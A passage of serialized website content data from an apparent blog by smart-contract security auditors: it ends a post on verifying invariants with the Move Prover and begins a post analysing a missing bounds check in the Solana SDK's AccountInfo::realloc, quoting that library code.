,{"type":33,"value":1123},{"type":27,"tag":207,"props":20649,"children":20650},{"style":8920},[20651],{"type":33,"value":15323},{"type":27,"tag":207,"props":20653,"children":20654},{"style":238},[20655],{"type":33,"value":2222},{"type":27,"tag":207,"props":20657,"children":20658},{"style":220},[20659],{"type":33,"value":13626},{"type":27,"tag":207,"props":20661,"children":20662},{"style":8920},[20663],{"type":33,"value":15344},{"type":27,"tag":207,"props":20665,"children":20666},{"style":238},[20667],{"type":33,"value":384},{"type":27,"tag":207,"props":20669,"children":20670},{"class":209,"line":270},[20671,20675,20679,20683,20687,20691,20695,20699,20703],{"type":27,"tag":207,"props":20672,"children":20673},{"style":214},[20674],{"type":33,"value":15356},{"type":27,"tag":207,"props":20676,"children":20677},{"style":220},[20678],{"type":33,"value":15361},{"type":27,"tag":207,"props":20680,"children":20681},{"style":226},[20682],{"type":33,"value":229},{"type":27,"tag":207,"props":20684,"children":20685},{"style":1335},[20686],{"type":33,"value":15370},{"type":27,"tag":207,"props":20688,"children":20689},{"style":238},[20690],{"type":33,"value":1343},{"type":27,"tag":207,"props":20692,"children":20693},{"style":220},[20694],{"type":33,"value":15281},{"type":27,"tag":207,"props":20696,"children":20697},{"style":238},[20698],{"type":33,"value":1123},{"type":27,"tag":207,"props":20700,"children":20701},{"style":220},[20702],{"type":33,"value":15298},{"type":27,"tag":207,"props":20704,"children":20705},{"style":238},[20706],{"type":33,"value":1455},{"type":27,"tag":207,"props":20708,"children":20709},{"class":209,"line":296},[20710,20714,20718,20722],{"type":27,"tag":207,"props":20711,"children":20712},{"style":1335},[20713],{"type":33,"value":15398},{"type":27,"tag":207,"props":20715,"children":20716},{"style":238},[20717],{"type":33,"value":1343},{"type":27,"tag":207,"props":20719,"children":20720},{"style":220},[20721],{"type":33,"value":15407},{"type":27,"tag":207,"props":20723,"children":20724},{"style":238},[20725],{"type":33,"value":10449},{"type":27,"tag":207,"props":20727,"children":20728},{"class":209,"line":445},[20729],{"type":27,"tag":207,"props":20730,"children":20731},{"style":238},[20732],{"type":33,"value":5312},{"type":27,"tag":207,"props":20734,"children":20735},{"class":209,"line":867},[20736,20740,20744],{"type":27,"tag":207,"props":20737,"children":20738},{"style":220},[20739],{"type":33,"value":15426},{"type":27,"tag":207,"props":20741,"children":20742},{"style":220},[20743],{"type":33,"value":15272},{"type":27,"tag":207,"props":20745,"children":20746},{"style":238},[20747],{"type":33,"value":384},{"type":27,"tag":207,"props":20749,"children":20750},{"class":209,"line":892},[20751,20755,20759,20763,20767],{"type":27,"tag":207,"props":20752,"children":20753},{"style":220},[20754],{"type":33,"value":15442},{"type":27,"tag":207,"props":20756,"children":20757},{"style":220},[20758],{"type":33,"value":15447},{"type":27,"tag":207,"props":20760,"children":20761},{"style":226},[20762],{"type":33,"value":10380},{"type":27,"tag":207,"props":20764,"children":20765},{"style":214},[20766],{"type":33,"value":15456},{"type":27,"tag":207,"props":20768,"children":20769},{"style":238},[20770],{"type":33,"value":241},{"type":27,"tag":207,"props":20772,"children":20773},{"class":209,"line":1475},[20774,20778,20782,20786,20790],{"type":27,"tag":207,"props":20775,"children":20776},{"style":220},[20777],{"type":33,"value":15468},{"type":27,"tag":207,"props":20779,"children":20780},{"style":220},[20781],{"type":33,"value":15473},{"type":27,"tag":207,"props":20783,"children":20784},{"style":226},[20785],{"type":33,"value":15478},{"type":27,"tag":207,"props":20787,"children":20788},{"style":220},[20789],{"type":33,"value":15483},{"type":27,"tag":207,"props":20791,"children":20792},{"style":238},[20793],{"type":33,"value":241},{"type":27,"tag":207,"props":20795,"children":20796},{"class":209,"line":2065},[20797,20801,20805,20809,20813],{"type":27,"tag":207,"props":20798,"children":20799},{"style":220},[20800],{"type":33,"value":15468},{"type":27,"tag":207,"props":20802,"children":20803},{"style":220},[20804],{"type":33,"value":15499},{"type":27,"tag":207,"props":20806,"children":20807},{"style":226},[20808],{"type":33,"value":15478},{"type":27,"tag":207,"props":20810,"children":20811},{"style":220},[20812],{"type":33,"value":15508},{"type":27,"tag":207,"props":20814,"children":20815},{"style":238},[20816],{"type":33,"value":241},{"type":27,"tag":207,"props":20818,"children":20819},{"class":209,"line":2092},[20820],{"type":27,"tag":207,"props":20821,"children":20822},{"style":238},[20823],{"type":33,"value":5312},{"type":27,"tag":36,"props":20825,"children":20826},{},[20827],{"type":33,"value":20828},"Some other ideas include",{"type":27,"tag":12719,"props":20830,"children":20831},{},[20832,20837,20842],{"type":27,"tag":1232,"props":20833,"children":20834},{},[20835],{"type":33,"value":20836},"Swapping through an AMM should never lead to a decrease in one side of the pool without also increasing the other side. In other words, no free money",{"type":27,"tag":1232,"props":20838,"children":20839},{},[20840],{"type":33,"value":20841},"Lending protocols should always be fully collateralized after a series of deposit, borrow, and withdraw instructions.",{"type":27,"tag":1232,"props":20843,"children":20844},{},[20845],{"type":33,"value":20846},"Orderbooks should never lose money after an order is placed and then canceled.",{"type":27,"tag":28,"props":20848,"children":20849},{"id":12591},[20850],{"type":33,"value":12594},{"type":27,"tag":36,"props":20852,"children":20853},{},[20854],{"type":33,"value":20855},"In this post, we've explored how to properly utilize the Move Prover to verify critical invariants about your codebase.",{"type":27,"tag":36,"props":20857,"children":20858},{},[20859],{"type":33,"value":20860},"In our upcoming posts, we will explore how to turn the Move Prover into a weapon for squashing security vulnerabilities by learning how to ask the right questions, so stay tuned!",{"type":27,"tag":36,"props":20862,"children":20863},{},[20864,20866,20871],{"type":33,"value":20865},"We're passionate about formal verification and pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":27,"tag":47,"props":20867,"children":20869},{"href":16517,"rel":20868},[51],[20870],{"type":33,"value":16521},{"type":33,"value":1041},{"type":27,"tag":10127,"props":20873,"children":20874},{},[20875],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":20877},[20878,20879,20882,20889],{"id":16581,"depth":244,"text":16584},{"id":16635,"depth":244,"text":16638,"children":20880},[20881],{"id":16886,"depth":270,"text":16882},{"id":19786,"depth":244,"text":19789,"children":20883},[20884,20885,20886,20887,20888],{"id":19802,"depth":270,"text":19805},{"id":20053,"depth":270,"text":20056},{"id":20358,"depth":270,"text":20361},{"id":20395,"depth":270,"text":20398},{"id":20558,"depth":270,"text":20561},{"id":12591,"depth":244,"text":12594},"content:blog:2022-09-16-move-prover.md","blog/2022-09-16-move-prover.md","blog/2022-09-16-move-prover",{"_path":20894,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":20895,"description":20896,"author":20897,"image":20898,"date":20901,"isFeatured":19,"onBlogPage":19,"tags":20902,"body":20903,"_type":10152,"_id":26012,"_source":10154,"_file":26013,"_stem":26014,"_extension":10157},"/blog/2022-12-09-rust-realloc-and-references","Rust, Realloc, and References","Rust is safe.. right? Not if your dependencies are unsafe.. A deep dive into a subtle Solana SDK bug, Rust internals, and how we found it all.","ethan",{"src":20899,"height":20900,"width":18},"/posts/rust-realloc-and-references/title.jpg",512,"2022-12-09",[10170,16545],{"type":24,"children":20904,"toc":25996},[20905,20933,20953,21622,21642,21653,21665,21798,21808,21814,21840,22179,22224,22551,22614,22627,22701,22769,22790,22803,22817,23165,23176,23181,23312,23363,23389,23401,23574,23710,23750,23787,23853,23858,23896,23950,23961,24104,24116,24122,24128,24161,24175,24296,24315,24343,24349,24438,24528,24534,24539,24585,24853,24928,24939,24966,25298,25310,25382,25655,25691,25992],{"type":27,"tag":36,"props":20906,"children":20907},{},[20908,20910,20916,20918,20923,20925,20931],{"type":33,"value":20909},"It all started with an audit of a program that used ",{"type":27,"tag":84,"props":20911,"children":20913},{"className":20912},[],[20914],{"type":33,"value":20915},"realloc",{"type":33,"value":20917}," on an account, without any bounds checks on the new size allowed. It seemed like the developers assumed that if the new size was too large, the ",{"type":27,"tag":84,"props":20919,"children":20921},{"className":20920},[],[20922],{"type":33,"value":20915},{"type":33,"value":20924}," call (from ",{"type":27,"tag":84,"props":20926,"children":20928},{"className":20927},[],[20929],{"type":33,"value":20930},"solana_program",{"type":33,"value":20932},") would error out appropriately.",{"type":27,"tag":36,"props":20934,"children":20935},{},[20936,20938,20944,20945,20952],{"type":33,"value":20937},"But we're not ones to just assume things around here, so let's take a look at how ",{"type":27,"tag":84,"props":20939,"children":20941},{"className":20940},[],[20942],{"type":33,"value":20943},"AccountInfo::realloc",{"type":33,"value":12784},{"type":27,"tag":47,"props":20946,"children":20949},{"href":20947,"rel":20948},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#124-148",[51],[20950],{"type":33,"value":20951},"implemented",{"type":33,"value":736},{"type":27,"tag":101,"props":20954,"children":20956},{"className":10270,"code":20955,"language":10269,"meta":7,"style":7},"pub fn realloc(&self, new_len: usize, zero_init: bool) -> Result\u003C(), ProgramError> {\n let orig_len = self.data_len();\n\n // realloc\n unsafe {\n // First set new length in the serialized data\n let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n *ptr = new_len as u64;\n\n // Then set the new length in the local slice\n let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n *ptr = new_len as u64;\n }\n\n // zero-init if requested\n if zero_init && new_len > orig_len {\n sol_memset(\n &mut self.try_borrow_mut_data()?[orig_len..],\n 0,\n new_len.saturating_sub(orig_len),\n );\n }\n\n Ok(())\n}\n",[20957],{"type":27,"tag":84,"props":20958,"children":20959},{"__ignoreMap":7},[20960,21053,21087,21094,21102,21114,21122,21214,21247,21254,21262,21392,21423,21430,21437,21445,21479,21491,21540,21552,21581,21588,21595,21602,21615],{"type":27,"tag":207,"props":20961,"children":20962},{"class":209,"line":210},[20963,20968,20973,20978,20982,20986,20991,20995,21000,21004,21009,21013,21018,21022,21026,21030,21034,21039,21044,21049],{"type":27,"tag":207,"props":20964,"children":20965},{"style":214},[20966],{"type":33,"value":20967},"pub",{"type":27,"tag":207,"props":20969,"children":20970},{"style":214},[20971],{"type":33,"value":20972}," fn",{"type":27,"tag":207,"props":20974,"children":20975},{"style":1335},[20976],{"type":33,"value":20977}," realloc",{"type":27,"tag":207,"props":20979,"children":20980},{"style":238},[20981],{"type":33,"value":1343},{"type":27,"tag":207,"props":20983,"children":20984},{"style":226},[20985],{"type":33,"value":10398},{"type":27,"tag":207,"props":20987,"children":20988},{"style":214},[20989],{"type":33,"value":20990},"self",{"type":27,"tag":207,"props":20992,"children":20993},{"style":238},[20994],{"type":33,"value":1123},{"type":27,"tag":207,"props":20996,"children":20997},{"style":220},[20998],{"type":33,"value":20999},"new_len",{"type":27,"tag":207,"props":21001,"children":21002},{"style":226},[21003],{"type":33,"value":736},{"type":27,"tag":207,"props":21005,"children":21006},{"style":8920},[21007],{"type":33,"value":21008}," usize",{"type":27,"tag":207,"props":21010,"children":21011},{"style":238},[21012],{"type":33,"value":1123},{"type":27,"tag":207,"props":21014,"children":21015},{"style":220},[21016],{"type":33,"value":21017},"zero_init",{"type":27,"tag":207,"props":21019,"children":21020},{"style":226},[21021],{"type":33,"value":736},{"type":27,"tag":207,"props":21023,"children":21024},{"style":8920},[21025],{"type":33,"value":19327},{"type":27,"tag":207,"props":21027,"children":21028},{"style":238},[21029],{"type":33,"value":2222},{"type":27,"tag":207,"props":21031,"children":21032},{"style":226},[21033],{"type":33,"value":8968},{"type":27,"tag":207,"props":21035,"children":21036},{"style":8920},[21037],{"type":33,"value":21038}," Result",{"type":27,"tag":207,"props":21040,"children":21041},{"style":238},[21042],{"type":33,"value":21043},"\u003C(), ",{"type":27,"tag":207,"props":21045,"children":21046},{"style":8920},[21047],{"type":33,"value":21048},"ProgramError",{"type":27,"tag":207,"props":21050,"children":21051},{"style":238},[21052],{"type":33,"value":14563},{"type":27,"tag":207,"props":21054,"children":21055},{"class":209,"line":244},[21056,21060,21065,21069,21074,21078,21083],{"type":27,"tag":207,"props":21057,"children":21058},{"style":214},[21059],{"type":33,"value":10290},{"type":27,"tag":207,"props":21061,"children":21062},{"style":220},[21063],{"type":33,"value":21064}," orig_len",{"type":27,"tag":207,"props":21066,"children":21067},{"style":226},[21068],{"type":33,"value":229},{"type":27,"tag":207,"props":21070,"children":21071},{"style":214},[21072],{"type":33,"value":21073}," self",{"type":27,"tag":207,"props":21075,"children":21076},{"style":226},[21077],{"type":33,"value":1041},{"type":27,"tag":207,"props":21079,"children":21080},{"style":1335},[21081],{"type":33,"value":21082},"data_len",{"type":27,"tag":207,"props":21084,"children":21085},{"style":238},[21086],{"type":33,"value":4301},{"type":27,"tag":207,"props":21088,"children":21089},{"class":209,"line":270},[21090],{"type":27,"tag":207,"props":21091,"children":21092},{"emptyLinePlaceholder":19},[21093],{"type":33,"value":2062},{"type":27,"tag":207,"props":21095,"children":21096},{"class":209,"line":296},[21097],{"type":27,"tag":207,"props":21098,"children":21099},{"style":4647},[21100],{"type":33,"value":21101}," // realloc\n",{"type":27,"tag":207,"props":21103,"children":21104},{"class":209,"line":445},[21105,21110],{"type":27,"tag":207,"props":21106,"children":21107},{"style":214},[21108],{"type":33,"value":21109}," unsafe",{"type":27,"tag":207,"props":21111,"children":21112},{"style":238},[21113],{"type":33,"value":384},{"type":27,"tag":207,"props":21115,"children":21116},{"class":209,"line":867},[21117],{"type":27,"tag":207,"props":21118,"children":21119},{"style":4647},[21120],{"type":33,"value":21121}," // First set new length in the serialized data\n",{"type":27,"tag":207,"props":21123,"children":21124},{"class":209,"line":892},[21125,21129,21134,21138,21142,21146,21151,21156,21160,21165,21169,21173,21178,21182,21186,21190,21194,21198,21202,21206,21210],{"type":27,"tag":207,"props":21126,"children":21127},{"style":214},[21128],{"type":33,"value":10353},{"type":27,"tag":207,"props":21130,"children":21131},{"style":220},[21132],{"type":33,"value":21133}," ptr",{"type":27,"tag":207,"props":21135,"children":21136},{"style":226},[21137],{"type":33,"value":229},{"type":27,"tag":207,"props":21139,"children":21140},{"style":214},[21141],{"type":33,"value":21073},{"type":27,"tag":207,"props":21143,"children":21144},{"style":226},[21145],{"type":33,"value":1041},{"type":27,"tag":207,"props":21147,"children":21148},{"style":1335},[21149],{"type":33,"value":21150},"try_borrow_mut_data",{"type":27,"tag":207,"props":21152,"children":21153},{"style":238},[21154],{"type":33,"value":21155},"()",{"type":27,"tag":207,"props":21157,"children":21158},{"style":226},[21159],{"type":33,"value":10421},{"type":27,"tag":207,"props":21161,"children":21162},{"style":1335},[21163],{"type":33,"value":21164},"as_mut_ptr",{"type":27,"tag":207,"props":21166,"children":21167},{"style":238},[21168],{"type":33,"value":21155},{"type":27,"tag":207,"props":21170,"children":21171},{"style":226},[21172],{"type":33,"value":1041},{"type":27,"tag":207,"props":21174,"children":21175},{"style":1335},[21176],{"type":33,"value":21177},"offset",{"type":27,"tag":207,"props":21179,"children":21180},{"style":238},[21181],{"type":33,"value":1343},{"type":27,"tag":207,"props":21183,"children":21184},{"style":226},[21185],{"type":33,"value":11611},{"type":27,"tag":207,"props":21187,"children":21188},{"style":232},[21189],{"type":33,"value":3578},{"type":27,"tag":207,"props":21191,"children":21192},{"style":238},[21193],{"type":33,"value":2222},{"type":27,"tag":207,"props":21195,"children":21196},{"style":214},[21197],{"type":33,"value":16122},{"type":27,"tag":207,"props":21199,"children":21200},{"style":226},[21201],{"type":33,"value":17093},{"type":27,"tag":207,"props":21203,"children":21204},{"style":214},[21205],{"type":33,"value":11009},{"type":27,"tag":207,"props":21207,"children":21208},{"style":8920},[21209],{"type":33,"value":13142},{"type":27,"tag":207,"props":21211,"children":21212},{"style":238},[21213],{"type":33,"value":241},{"type":27,"tag":207,"props":21215,"children":21216},{"class":209,"line":1475},[21217,21221,21226,21230,21235,21239,21243],{"type":27,"tag":207,"props":21218,"children":21219},{"style":226},[21220],{"type":33,"value":15034},{"type":27,"tag":207,"props":21222,"children":21223},{"style":220},[21224],{"type":33,"value":21225},"ptr",{"type":27,"tag":207,"props":21227,"children":21228},{"style":226},[21229],{"type":33,"value":229},{"type":27,"tag":207,"props":21231,"children":21232},{"style":220},[21233],{"type":33,"value":21234}," new_len",{"type":27,"tag":207,"props":21236,"children":21237},{"style":214},[21238],{"type":33,"value":16108},{"type":27,"tag":207,"props":21240,"children":21241},{"style":8920},[21242],{"type":33,"value":13142},{"type":27,"tag":207,"props":21244,"children":21245},{"style":238},[21246],{"type":33,"value":241},{"type":27,"tag":207,"props":21248,"children":21249},{"class":209,"line":2065},[21250],{"type":27,"tag":207,"props":21251,"children":21252},{"emptyLinePlaceholder":19},[21253],{"type":33,"value":2062},{"type":27,"tag":207,"props":21255,"children":21256},{"class":209,"line":2092},[21257],{"type":27,"tag":207,"props":21258,"children":21259},{"style":4647},[21260],{"type":33,"value":21261}," // Then set the new length in the local slice\n",{"type":27,"tag":207,"props":21263,"children":21264},{"class":209,"line":2130},[21265,21269,21273,21277,21281,21285,21289,21294,21298,21302,21306,21310,21315,21320,21324,21328,21332,21336,21340,21344,21348,21352,21356,21360,21364,21368,21372,21376,21380,21384,21388],{"type":27,"tag":207,"props":21266,"children":21267},{"style":214},[21268],{"type":33,"value":10353},{"type":27,"tag":207,"props":21270,"children":21271},{"style":220},[21272],{"type":33,"value":21133},{"type":27,"tag":207,"props":21274,"children":21275},{"style":226},[21276],{"type":33,"value":229},{"type":27,"tag":207,"props":21278,"children":21279},{"style":226},[21280],{"type":33,"value":14423},{"type":27,"tag":207,"props":21282,"children":21283},{"style":214},[21284],{"type":33,"value":11009},{"type":27,"tag":207,"props":21286,"children":21287},{"style":226},[21288],{"type":33,"value":17093},{"type":27,"tag":207,"props":21290,"children":21291},{"style":238},[21292],{"type":33,"value":21293},"(((",{"type":27,"tag":207,"props":21295,"children":21296},{"style":214},[21297],{"type":33,"value":20990},{"type":27,"tag":207,"props":21299,"children":21300},{"style":226},[21301],{"type":33,"value":1041},{"type":27,"tag":207,"props":21303,"children":21304},{"style":238},[21305],{"type":33,"value":9468},{"type":27,"tag":207,"props":21307,"children":21308},{"style":226},[21309],{"type":33,"value":1041},{"type":27,"tag":207,"props":21311,"children":21312},{"style":1335},[21313],{"type":33,"value":21314},"as_ptr",{"type":27,"tag":207,"props":21316,"children":21317},{"style":238},[21318],{"type":33,"value":21319},"() ",{"type":27,"tag":207,"props":21321,"children":21322},{"style":214},[21323],{"type":33,"value":16122},{"type":27,"tag":207,"props":21325,"children":21326},{"style":226},[21327],{"type":33,"value":17093},{"type":27,"tag":207,"props":21329,"children":21330},{"style":214},[21331],{"type":33,"value":16931},{"type":27,"tag":207,"props":21333,"children":21334},{"style":8920},[21335],{"type":33,"value":13142},{"type":27,"tag":207,"props":21337,"children":21338},{"style":238},[21339],{"type":33,"value":10416},{"type":27,"tag":207,"props":21341,"children":21342},{"style":226},[21343],{"type":33,"value":1041},{"type":27,"tag":207,"props":21345,"children":21346},{"style":1335},[21347],{"type":33,"value":21177},{"type":27,"tag":207,"props":21349,"children":21350},{"style":238},[21351],{"type":33,"value":1343},{"type":27,"tag":207,"props":21353,"children":21354},{"style":232},[21355],{"type":33,"value":1651},{"type":27,"tag":207,"props":21357,"children":21358},{"style":238},[21359],{"type":33,"value":2222},{"type":27,"tag":207,"props":21361,"children":21362},{"style":214},[21363],{"type":33,"value":16122},{"type":27,"tag":207,"props":21365,"children":21366},{"style":8920},[21367],{"type":33,"value":13142},{"type":27,"tag":207,"props":21369,"children":21370},{"style":238},[21371],{"type":33,"value":2222},{"type":27,"tag":207,"props":21373,"children":21374},{"style":214},[21375],{"type":33,"value":16122},{"type":27,"tag":207,"props":21377,"children":21378},{"style":226},[21379],{"type":33,"value":17093},{"type":27,"tag":207,"props":21381,"children":21382},{"style":214},[21383],{"type":33,"value":11009},{"type":27,"tag":207,"props":21385,"children":21386},{"style":8920},[21387],{"type":33,"value":13142},{"type":27,"tag":207,"props":21389,"children":21390},{"style":238},[21391],{"type":33,"value":1455},{"type":27,"tag":207,"props":21393,"children":21394},{"class":209,"line":2168},[21395,21399,21403,21407,21411,21415,21419],{"type":27,"tag":207,"props":21396,"children":21397},{"style":226},[21398],{"type":33,"value":15034},{"type":27,"tag":207,"props":21400,"children":21401},{"style":220},[21402],{"type":33,"value":21225},{"type":27,"tag":207,"props":21404,"children":21405},{"style":226},[21406],{"type":33,"value":229},{"type":27,"tag":207,"props":21408,"children":21409},{"style":220},[21410],{"type":33,"value":21234},{"type":27,"tag":207,"props":21412,"children":21413},{"style":214},[21414],{"type":33,"value":16108},{"type":27,"tag":207,"props":21416,"children":21417},{"style":8920},[21418],{"type":33,"value":13142},{"type":27,"tag":207,"props":21420,"children":21421},{"style":238},[21422],{"type":33,"value":241},{"type":27,"tag":207,"props":21424,"children":21425},{"class":209,"line":4095},[21426],{"type":27,"tag":207,"props":21427,"children":21428},{"style":238},[21429],{"type":33,"value":10645},{"type":27,"tag":207,"props":21431,"children":21432},{"class":209,"line":4103},[21433],{"type":27,"tag":207,"props":21434,"children":21435},{"emptyLinePlaceholder":19},[21436],{"type":33,"value":2062},{"type":27,"tag":207,"props":21438,"children":21439},{"class":209,"line":4154},[21440],{"type":27,"tag":207,"props":21441,"children":21442},{"style":4647},[21443],{"type":33,"value":21444}," // zero-init if requested\n",{"type":27,"tag":207,"props":21446,"children":21447},{"class":209,"line":4203},[21448,21452,21457,21462,21466,21471,21475],{"type":27,"tag":207,"props":21449,"children":21450},{"style":376},[21451],{"type":33,"value":19556},{"type":27,"tag":207,"props":21453,"children":21454},{"style":220},[21455],{"type":33,"value":21456}," zero_init",{"type":27,"tag":207,"props":21458,"children":21459},{"style":226},[21460],{"type":33,"value":21461}," &&",{"type":27,"tag":207,"props":21463,"children":21464},{"style":220},[21465],{"type":33,"value":21234},{"type":27,"tag":207,"props":21467,"children":21468},{"style":226},[21469],{"type":33,"value":21470}," >",{"type":27,"tag":207,"props":21472,"children":21473},{"style":220},[21474],{"type":33,"value":21064},{"type":27,"tag":207,"props":21476,"children":21477},{"style":238},[21478],{"type":33,"value":384},{"type":27,"tag":207,"props":21480,"children":21481},{"class":209,"line":4249},[21482,21487],{"type":27,"tag":207,"props":21483,"children":21484},{"style":1335},[21485],{"type":33,"value":21486}," sol_memset",{"type":27,"tag":207,"props":21488,"children":21489},{"style":238},[21490],{"type":33,"value":9090},{"type":27,"tag":207,"props":21492,"children":21493},{"class":209,"line":4290},[21494,21498,21502,21506,21510,21514,21518,21522,21526,21531,21535],{"type":27,"tag":207,"props":21495,"children":21496},{"style":226},[21497],{"type":33,"value":14967},{"type":27,"tag":207,"props":21499,"children":21500},{"style":214},[21501],{"type":33,"value":11009},{"type":27,"tag":207,"props":21503,"children":21504},{"style":214},[21505],{"type":33,"value":21073},{"type":27,"tag":207,"props":21507,"children":21508},{"style":226},[21509],{"type":33,"value":1041},{"type":27,"tag":207,"props":21511,"children":21512},{"style":1335},[21513],{"type":33,"value":21150},{"type":27,"tag":207,"props":21515,"children":21516},{"style":238},[21517],{"type":33,"value":21155},{"type":27,"tag":207,"props":21519,"children":21520},{"style":226},[21521],{"type":33,"value":10444},{"type":27,"tag":207,"props":21523,"children":21524},{"style":238},[21525],{"type":33,"value":11019},{"type":27,"tag":207,"props":21527,"children":21528},{"style":220},[21529],{"type":33,"value":21530},"orig_len",{"type":27,"tag":207,"props":21532,"children":21533},{"style":226},[21534],{"type":33,"value":10340},{"type":27,"tag":207,"props":21536,"children":21537},{"style":238},[21538],{"type":33,"value":21539},"],\n",{"type":27,"tag":207,"props":21541,"children":21542},{"class":209,"line":4304},[21543,21548],{"type":27,"tag":207,"props":21544,"children":21545},{"style":232},[21546],{"type":33,"value":21547}," 0",{"type":27,"tag":207,"props":21549,"children":21550},{"style":238},[21551],{"type":33,"value":1842},{"type":27,"tag":207,"props":21553,"children":21554},{"class":209,"line":5466},[21555,21560,21564,21569,21573,21577],{"type":27,"tag":207,"props":21556,"children":21557},{"style":220},[21558],{"type":33,"value":21559}," new_len",{"type":27,"tag":207,"props":21561,"children":21562},{"style":226},[21563],{"type":33,"value":1041},{"type":27,"tag":207,"props":21565,"children":21566},{"style":1335},[21567],{"type":33,"value":21568},"saturating_sub",{"type":27,"tag":207,"props":21570,"children":21571},{"style":238},[21572],{"type":33,"value":1343},{"type":27,"tag":207,"props":21574,"children":21575},{"style":220},[21576],{"type":33,"value":21530},{"type":27,"tag":207,"props":21578,"children":21579},{"style":238},[21580],{"type":33,"value":14018},{"type":27,"tag":207,"props":21582,"children":21583},{"class":209,"line":5530},[21584],{"type":27,"tag":207,"props":21585,"children":21586},{"style":238},[21587],{"type":33,"value":15026},{"type":27,"tag":207,"props":21589,"children":21590},{"class":209,"line":7900},[21591],{"type":27,"tag":207,"props":21592,"children":21593},{"style":238},[21594],{"type":33,"value":10645},{"type":27,"tag":207,"props":21596,"children":21597},{"class":209,"line":7909},[21598],{"type":27,"tag":207,"props":21599,"children":21600},{"emptyLinePlaceholder":19},[21601],{"type":33,"value":2062},{"type":27,"tag":207,"props":21603,"children":21604},{"class":209,"line":7917},[21605,21610],{"type":27,"tag":207,"props":21606,"children":21607},{"style":8920},[21608],{"type":33,"value":21609}," Ok",{"type":27,"tag":207,"props":21611,"children":21612},{"style":238},[21613],{"type":33,"value":21614},"(())\n",{"type":27,"tag":207,"props":21616,"children":21617},{"class":209,"line":7926},[21618],{"type":27,"tag":207,"props":21619,"children":21620},{"style":238},[21621],{"type":33,"value":451},{"type":27,"tag":36,"props":21623,"children":21624},{},[21625,21627,21633,21635,21640],{"type":33,"value":21626},"Oh. There's ",{"type":27,"tag":84,"props":21628,"children":21630},{"className":21629},[],[21631],{"type":33,"value":21632},"unsafe",{"type":33,"value":21634},". And no bounds check in sight. ",{"type":27,"tag":942,"props":21636,"children":21637},{},[21638],{"type":33,"value":21639},"And",{"type":33,"value":21641}," pointer math. That doesn't look promising...",{"type":27,"tag":28,"props":21643,"children":21645},{"id":21644},"breaking-down-realloc",[21646,21648],{"type":33,"value":21647},"Breaking down ",{"type":27,"tag":84,"props":21649,"children":21651},{"className":21650},[],[21652],{"type":33,"value":20915},{"type":27,"tag":36,"props":21654,"children":21655},{},[21656,21658,21663],{"type":33,"value":21657},"Let's pick apart this ",{"type":27,"tag":84,"props":21659,"children":21661},{"className":21660},[],[21662],{"type":33,"value":21632},{"type":33,"value":21664}," block, since there's a lot going on here.",{"type":27,"tag":101,"props":21666,"children":21668},{"className":10270,"code":21667,"language":10269,"meta":7,"style":7},"// First set new length in the serialized data\nlet ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n*ptr = new_len as u64;\n",[21669],{"type":27,"tag":84,"props":21670,"children":21671},{"__ignoreMap":7},[21672,21680,21767],{"type":27,"tag":207,"props":21673,"children":21674},{"class":209,"line":210},[21675],{"type":27,"tag":207,"props":21676,"children":21677},{"style":4647},[21678],{"type":33,"value":21679},"// First set new length in the serialized data\n",{"type":27,"tag":207,"props":21681,"children":21682},{"class":209,"line":244},[21683,21687,21691,21695,21699,21703,21707,21711,21715,21719,21723,21727,21731,21735,21739,21743,21747,21751,21755,21759,21763],{"type":27,"tag":207,"props":21684,"children":21685},{"style":214},[21686],{"type":33,"value":217},{"type":27,"tag":207,"props":21688,"children":21689},{"style":220},[21690],{"type":33,"value":21133},{"type":27,"tag":207,"props":21692,"children":21693},{"style":226},[21694],{"type":33,"value":229},{"type":27,"tag":207,"props":21696,"children":21697},{"style":214},[21698],{"type":33,"value":21073},{"type":27,"tag":207,"props":21700,"children":21701},{"style":226},[21702],{"type":33,"value":1041},{"type":27,"tag":207,"props":21704,"children":21705},{"style":1335},[21706],{"type":33,"value":21150},{"type":27,"tag":207,"props":21708,"children":21709},{"style":238},[21710],{"type":33,"value":21155},{"type":27,"tag":207,"props":21712,"children":21713},{"style":226},[21714],{"type":33,"value":10421},{"type":27,"tag":207,"props":21716,"children":21717},{"style":1335},[21718],{"type":33,"value":21164},{"type":27,"tag":207,"props":21720,"children":21721},{"style":238},[21722],{"type":33,"value":21155},{"type":27,"tag":207,"props":21724,"children":21725},{"style":226},[21726],{"type":33,"value":1041},{"type":27,"tag":207,"props":21728,"children":21729},{"style":1335},[21730],{"type":33,"value":21177},{"type":27,"tag":207,"props":21732,"children":21733},{"style":238},[21734],{"type":33,"value":1343},{"type":27,"tag":207,"props":21736,"children":21737},{"style":226},[21738],{"type":33,"value":11611},{"type":27,"tag":207,"props":21740,"children":21741},{"style":232},[21742],{"type":33,"value":3578},{"type":27,"tag":207,"props":21744,"children":21745},{"style":238},[21746],{"type":33,"value":2222},{"type":27,"tag":207,"props":21748,"children":21749},{"style":214},[21750],{"type":33,"value":16122},{"type":27,"tag":207,"props":21752,"children":21753},{"style":226},[21754],{"type":33,"value":17093},{"type":27,"tag":207,"props":21756,"children":21757},{"style":214},[21758],{"type":33,"value":11009},{"type":27,"tag":207,"props":21760,"children":21761},{"style":8920},[21762],{"type":33,"value":13142},{"type":27,"tag":207,"props":21764,"children":21765},{"style":238},[21766],{"type":33,"value":241},{"type":27,"tag":207,"props":21768,"children":21769},{"class":209,"line":270},[21770,21774,21778,21782,21786,21790,21794],{"type":27,"tag":207,"props":21771,"children":21772},{"style":226},[21773],{"type":33,"value":9286},{"type":27,"tag":207,"props":21775,"children":21776},{"style":220},[21777],{"type":33,"value":21225},{"type":27,"tag":207,"props":21779,"children":21780},{"style":226},[21781],{"type":33,"value":229},{"type":27,"tag":207,"props":21783,"children":21784},{"style":220},[21785],{"type":33,"value":21234},{"type":27,"tag":207,"props":21787,"children":21788},{"style":214},[21789],{"type":33,"value":16108},{"type":27,"tag":207,"props":21791,"children":21792},{"style":8920},[21793],{"type":33,"value":13142},{"type":27,"tag":207,"props":21795,"children":21796},{"style":238},[21797],{"type":33,"value":241},{"type":27,"tag":36,"props":21799,"children":21800},{},[21801,21806],{"type":27,"tag":84,"props":21802,"children":21804},{"